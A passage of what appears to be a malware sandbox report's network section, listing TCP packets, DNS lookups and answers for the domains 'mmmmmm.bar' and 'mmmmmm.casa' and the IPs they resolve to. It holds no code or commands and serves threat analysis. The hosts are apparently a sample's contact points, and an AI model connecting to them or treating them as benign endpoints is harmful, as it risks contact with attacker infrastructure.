                            Jan 12, 2022 11:10:58.012622118 CET804976531.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.527478933 CET4976680192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.529087067 CET4976780192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.530560970 CET4976880192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.531230927 CET4976980192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.588094950 CET804976631.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.588305950 CET4976680192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.589112997 CET4976680192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.591792107 CET804976931.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.591985941 CET4976980192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.592505932 CET804976731.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.592601061 CET4976780192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.592690945 CET4976980192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.594582081 CET804976831.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.594681978 CET4976880192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.649451971 CET804976631.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.649490118 CET804976631.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.649614096 CET4976680192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.649710894 CET4976680192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.650343895 CET4976780192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.652865887 CET804976931.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.652885914 CET804976931.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.652966022 CET4976980192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.653085947 CET4976980192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.709979057 CET804976631.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.713052988 CET804976931.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.713696957 CET804976731.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.713789940 CET804976731.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.713866949 CET4976780192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.714144945 CET4976780192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.715136051 CET4977080192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.722198963 CET4977180192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.777916908 CET804976731.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.778568983 CET804977031.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.778681040 CET4977080192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.779408932 CET4977080192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.782439947 CET804977131.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.782525063 CET4977180192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.842955112 CET804977031.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.842978954 CET804977031.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.843051910 CET4977080192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.843166113 CET4977080192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.843786001 CET4977180192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.903233051 CET804977131.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.903315067 CET804977131.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.903382063 CET4977180192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.903660059 CET4977180192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.905977964 CET804977031.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.910906076 CET4977380192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.911062956 CET4977280192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.962960005 CET804977131.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.972395897 CET804977231.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.972548008 CET4977280192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.973938942 CET804977331.41.45.66192.168.2.6
                            Jan 12, 2022 11:10:59.974040985 CET4977380192.168.2.631.41.45.66
                            Jan 12, 2022 11:10:59.974314928 CET4977280192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.034418106 CET804977231.41.45.66192.168.2.6
                            Jan 12, 2022 11:11:00.034445047 CET804977231.41.45.66192.168.2.6
                            Jan 12, 2022 11:11:00.034734964 CET4977280192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.035065889 CET4977280192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.035780907 CET4977380192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.094723940 CET804977231.41.45.66192.168.2.6
                            Jan 12, 2022 11:11:00.098901033 CET804977331.41.45.66192.168.2.6
                            Jan 12, 2022 11:11:00.099031925 CET804977331.41.45.66192.168.2.6
                            Jan 12, 2022 11:11:00.099087954 CET4977380192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.099195957 CET4977380192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.100171089 CET4977480192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.101027966 CET4977580192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.160788059 CET804977431.41.45.66192.168.2.6
                            Jan 12, 2022 11:11:00.160908937 CET4977480192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.162332058 CET804977531.41.45.66192.168.2.6
                            Jan 12, 2022 11:11:00.162373066 CET804977331.41.45.66192.168.2.6
                            Jan 12, 2022 11:11:00.162424088 CET4977580192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.163161039 CET4977480192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.223592997 CET804977431.41.45.66192.168.2.6
                            Jan 12, 2022 11:11:00.223638058 CET804977431.41.45.66192.168.2.6
                            Jan 12, 2022 11:11:00.223758936 CET4977480192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.224144936 CET4977480192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:00.284312010 CET804977431.41.45.66192.168.2.6
                            Jan 12, 2022 11:11:02.029249907 CET4976480192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:03.291565895 CET4976880192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:04.741748095 CET4977580192.168.2.631.41.45.66
                            Jan 12, 2022 11:11:43.075547934 CET4978480192.168.2.6162.255.119.219
                            Jan 12, 2022 11:11:43.075896025 CET4978580192.168.2.6162.255.119.219
                            Jan 12, 2022 11:11:43.252368927 CET8049785162.255.119.219192.168.2.6
                            Jan 12, 2022 11:11:43.254070997 CET8049784162.255.119.219192.168.2.6
                            Jan 12, 2022 11:11:43.254070044 CET4978580192.168.2.6162.255.119.219
                            Jan 12, 2022 11:11:43.254138947 CET4978480192.168.2.6162.255.119.219
                            Jan 12, 2022 11:11:43.259551048 CET4978580192.168.2.6162.255.119.219

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Jan 12, 2022 11:10:57.730180025 CET5606153192.168.2.68.8.8.8
                            Jan 12, 2022 11:10:57.748259068 CET53560618.8.8.8192.168.2.6
                            Jan 12, 2022 11:10:59.470350981 CET5833653192.168.2.68.8.8.8
                            Jan 12, 2022 11:10:59.476408958 CET5378153192.168.2.68.8.8.8
                            Jan 12, 2022 11:10:59.488543987 CET53583368.8.8.8192.168.2.6
                            Jan 12, 2022 11:10:59.492948055 CET53537818.8.8.8192.168.2.6
                            Jan 12, 2022 11:11:42.951206923 CET6330753192.168.2.68.8.8.8
                            Jan 12, 2022 11:11:42.969363928 CET53633078.8.8.8192.168.2.6
                            Jan 12, 2022 11:11:44.305556059 CET4969453192.168.2.68.8.8.8
                            Jan 12, 2022 11:11:44.324812889 CET53496948.8.8.8192.168.2.6
                            Jan 12, 2022 11:11:44.633872032 CET5498253192.168.2.68.8.8.8
                            Jan 12, 2022 11:11:44.648876905 CET5001053192.168.2.68.8.8.8
                            Jan 12, 2022 11:11:44.650337934 CET53549828.8.8.8192.168.2.6
                            Jan 12, 2022 11:11:44.657346964 CET6371853192.168.2.68.8.8.8
                            Jan 12, 2022 11:11:44.667021990 CET53500108.8.8.8192.168.2.6
                            Jan 12, 2022 11:11:44.676259995 CET53637188.8.8.8192.168.2.6
                            Jan 12, 2022 11:12:12.912772894 CET5070053192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:12.929047108 CET53507008.8.8.8192.168.2.6
                            Jan 12, 2022 11:12:14.482944965 CET5406953192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:14.500998974 CET53540698.8.8.8192.168.2.6
                            Jan 12, 2022 11:12:14.586354971 CET6117853192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:14.589658976 CET5701753192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:14.604964018 CET53611788.8.8.8192.168.2.6
                            Jan 12, 2022 11:12:14.606554031 CET53570178.8.8.8192.168.2.6
                            Jan 12, 2022 11:12:14.938334942 CET5632753192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:14.958069086 CET53563278.8.8.8192.168.2.6
                            Jan 12, 2022 11:12:15.058007002 CET5024353192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:15.058362007 CET6205553192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:15.076155901 CET53620558.8.8.8192.168.2.6
                            Jan 12, 2022 11:12:15.076617002 CET53502438.8.8.8192.168.2.6
                            Jan 12, 2022 11:12:38.614614010 CET5506653192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:38.639072895 CET53550668.8.8.8192.168.2.6
                            Jan 12, 2022 11:12:39.055082083 CET6021153192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:40.053675890 CET6021153192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:40.071034908 CET53602118.8.8.8192.168.2.6
                            Jan 12, 2022 11:12:44.773718119 CET5657053192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:44.786896944 CET5845453192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:44.791939974 CET53565708.8.8.8192.168.2.6
                            Jan 12, 2022 11:12:44.805145025 CET53584548.8.8.8192.168.2.6
                            Jan 12, 2022 11:12:44.857934952 CET5518053192.168.2.68.8.8.8
                            Jan 12, 2022 11:12:44.876108885 CET53551808.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:08.327765942 CET5294353192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:08.345885992 CET53529438.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:09.341195107 CET5948953192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:09.357256889 CET53594898.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:09.661207914 CET6402253192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:09.680032015 CET53640228.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:09.763242960 CET6002353192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:09.781877995 CET53600238.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:10.122340918 CET5719353192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:10.138983011 CET5024853192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:10.140886068 CET53571938.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:10.185605049 CET53502488.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:10.191317081 CET6441353192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:10.211249113 CET53644138.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:30.555993080 CET6034553192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:30.573930025 CET53603458.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:30.591098070 CET5873053192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:30.609044075 CET53587308.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:30.643920898 CET5383053192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:30.660099983 CET53538308.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:31.714107990 CET5722653192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:31.731359959 CET53572268.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:32.122342110 CET5788053192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:32.141119003 CET53578808.8.8.8192.168.2.6
                            Jan 12, 2022 11:13:52.573908091 CET5318753192.168.2.68.8.8.8
                            Jan 12, 2022 11:13:52.592689037 CET53531878.8.8.8192.168.2.6

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Jan 12, 2022 11:10:57.730180025 CET192.168.2.68.8.8.80x7259Standard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:10:59.470350981 CET192.168.2.68.8.8.80xfafcStandard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:10:59.476408958 CET192.168.2.68.8.8.80xc8c1Standard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:42.951206923 CET192.168.2.68.8.8.80x8c29Standard query (0)mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.305556059 CET192.168.2.68.8.8.80x3b37Standard query (0)www.mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.633872032 CET192.168.2.68.8.8.80xdab7Standard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.648876905 CET192.168.2.68.8.8.80x69c2Standard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.657346964 CET192.168.2.68.8.8.80x837fStandard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:12.912772894 CET192.168.2.68.8.8.80x5353Standard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.482944965 CET192.168.2.68.8.8.80x8489Standard query (0)mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.586354971 CET192.168.2.68.8.8.80x3174Standard query (0)mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.589658976 CET192.168.2.68.8.8.80xa92aStandard query (0)mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.938334942 CET192.168.2.68.8.8.80x55c0Standard query (0)www.mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.058007002 CET192.168.2.68.8.8.80xac06Standard query (0)www.mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.058362007 CET192.168.2.68.8.8.80x5abdStandard query (0)www.mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:38.614614010 CET192.168.2.68.8.8.80xd780Standard query (0)mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:39.055082083 CET192.168.2.68.8.8.80x2dedStandard query (0)www.mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:40.053675890 CET192.168.2.68.8.8.80x2dedStandard query (0)www.mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:44.773718119 CET192.168.2.68.8.8.80xffa0Standard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:44.786896944 CET192.168.2.68.8.8.80x817fStandard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:44.857934952 CET192.168.2.68.8.8.80x9884Standard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:08.327765942 CET192.168.2.68.8.8.80x6222Standard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:09.341195107 CET192.168.2.68.8.8.80x3e3cStandard query (0)mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:09.661207914 CET192.168.2.68.8.8.80xa4b6Standard query (0)mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:09.763242960 CET192.168.2.68.8.8.80x8915Standard query (0)mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.122340918 CET192.168.2.68.8.8.80x5c20Standard query (0)www.mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.138983011 CET192.168.2.68.8.8.80x2a36Standard query (0)www.mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.191317081 CET192.168.2.68.8.8.80xd57dStandard query (0)www.mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:30.555993080 CET192.168.2.68.8.8.80xdf87Standard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:30.591098070 CET192.168.2.68.8.8.80x154fStandard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:30.643920898 CET192.168.2.68.8.8.80x8fc7Standard query (0)mmmmmm.barA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:31.714107990 CET192.168.2.68.8.8.80x9c2bStandard query (0)mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:32.122342110 CET192.168.2.68.8.8.80xbbeeStandard query (0)www.mmmmmm.casaA (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:52.573908091 CET192.168.2.68.8.8.80x2c1cStandard query (0)mmmmmm.barA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Jan 12, 2022 11:10:57.748259068 CET8.8.8.8192.168.2.60x7259No error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:10:59.488543987 CET8.8.8.8192.168.2.60xfafcNo error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:10:59.492948055 CET8.8.8.8192.168.2.60xc8c1No error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:42.969363928 CET8.8.8.8192.168.2.60x8c29No error (0)mmmmmm.casa162.255.119.219A (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.324812889 CET8.8.8.8192.168.2.60x3b37No error (0)www.mmmmmm.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                            Jan 12, 2022 11:11:44.324812889 CET8.8.8.8192.168.2.60x3b37No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.324812889 CET8.8.8.8192.168.2.60x3b37No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.324812889 CET8.8.8.8192.168.2.60x3b37No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.324812889 CET8.8.8.8192.168.2.60x3b37No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.324812889 CET8.8.8.8192.168.2.60x3b37No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.324812889 CET8.8.8.8192.168.2.60x3b37No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.324812889 CET8.8.8.8192.168.2.60x3b37No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.650337934 CET8.8.8.8192.168.2.60xdab7No error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.667021990 CET8.8.8.8192.168.2.60x69c2No error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:11:44.676259995 CET8.8.8.8192.168.2.60x837fNo error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:12.929047108 CET8.8.8.8192.168.2.60x5353No error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.500998974 CET8.8.8.8192.168.2.60x8489No error (0)mmmmmm.casa162.255.119.219A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.604964018 CET8.8.8.8192.168.2.60x3174No error (0)mmmmmm.casa162.255.119.219A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.606554031 CET8.8.8.8192.168.2.60xa92aNo error (0)mmmmmm.casa162.255.119.219A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.958069086 CET8.8.8.8192.168.2.60x55c0No error (0)www.mmmmmm.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                            Jan 12, 2022 11:12:14.958069086 CET8.8.8.8192.168.2.60x55c0No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.958069086 CET8.8.8.8192.168.2.60x55c0No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.958069086 CET8.8.8.8192.168.2.60x55c0No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.958069086 CET8.8.8.8192.168.2.60x55c0No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.958069086 CET8.8.8.8192.168.2.60x55c0No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.958069086 CET8.8.8.8192.168.2.60x55c0No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:14.958069086 CET8.8.8.8192.168.2.60x55c0No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076155901 CET8.8.8.8192.168.2.60x5abdNo error (0)www.mmmmmm.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                            Jan 12, 2022 11:12:15.076155901 CET8.8.8.8192.168.2.60x5abdNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076155901 CET8.8.8.8192.168.2.60x5abdNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076155901 CET8.8.8.8192.168.2.60x5abdNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076155901 CET8.8.8.8192.168.2.60x5abdNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076155901 CET8.8.8.8192.168.2.60x5abdNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076155901 CET8.8.8.8192.168.2.60x5abdNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076155901 CET8.8.8.8192.168.2.60x5abdNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076617002 CET8.8.8.8192.168.2.60xac06No error (0)www.mmmmmm.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                            Jan 12, 2022 11:12:15.076617002 CET8.8.8.8192.168.2.60xac06No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076617002 CET8.8.8.8192.168.2.60xac06No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076617002 CET8.8.8.8192.168.2.60xac06No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076617002 CET8.8.8.8192.168.2.60xac06No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076617002 CET8.8.8.8192.168.2.60xac06No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076617002 CET8.8.8.8192.168.2.60xac06No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:15.076617002 CET8.8.8.8192.168.2.60xac06No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:38.639072895 CET8.8.8.8192.168.2.60xd780No error (0)mmmmmm.casa162.255.119.219A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:40.071034908 CET8.8.8.8192.168.2.60x2dedNo error (0)www.mmmmmm.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                            Jan 12, 2022 11:12:40.071034908 CET8.8.8.8192.168.2.60x2dedNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:40.071034908 CET8.8.8.8192.168.2.60x2dedNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:40.071034908 CET8.8.8.8192.168.2.60x2dedNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:40.071034908 CET8.8.8.8192.168.2.60x2dedNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:40.071034908 CET8.8.8.8192.168.2.60x2dedNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:40.071034908 CET8.8.8.8192.168.2.60x2dedNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:40.071034908 CET8.8.8.8192.168.2.60x2dedNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:44.791939974 CET8.8.8.8192.168.2.60xffa0No error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:44.805145025 CET8.8.8.8192.168.2.60x817fNo error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:12:44.876108885 CET8.8.8.8192.168.2.60x9884No error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:08.345885992 CET8.8.8.8192.168.2.60x6222No error (0)mmmmmm.bar31.41.45.66A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:09.357256889 CET8.8.8.8192.168.2.60x3e3cNo error (0)mmmmmm.casa162.255.119.219A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:09.680032015 CET8.8.8.8192.168.2.60xa4b6No error (0)mmmmmm.casa162.255.119.219A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:09.781877995 CET8.8.8.8192.168.2.60x8915No error (0)mmmmmm.casa162.255.119.219A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.140886068 CET8.8.8.8192.168.2.60x5c20No error (0)www.mmmmmm.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                            Jan 12, 2022 11:13:10.140886068 CET8.8.8.8192.168.2.60x5c20No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.140886068 CET8.8.8.8192.168.2.60x5c20No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.140886068 CET8.8.8.8192.168.2.60x5c20No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.140886068 CET8.8.8.8192.168.2.60x5c20No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.140886068 CET8.8.8.8192.168.2.60x5c20No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.140886068 CET8.8.8.8192.168.2.60x5c20No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.140886068 CET8.8.8.8192.168.2.60x5c20No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.185605049 CET8.8.8.8192.168.2.60x2a36No error (0)www.mmmmmm.casaparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                            Jan 12, 2022 11:13:10.185605049 CET8.8.8.8192.168.2.60x2a36No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.185605049 CET8.8.8.8192.168.2.60x2a36No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.185605049 CET8.8.8.8192.168.2.60x2a36No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.185605049 CET8.8.8.8192.168.2.60x2a36No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.185605049 CET8.8.8.8192.168.2.60x2a36No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                            Jan 12, 2022 11:13:10.185605049 CET8.8.8.8192.168.2.60x2a36No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
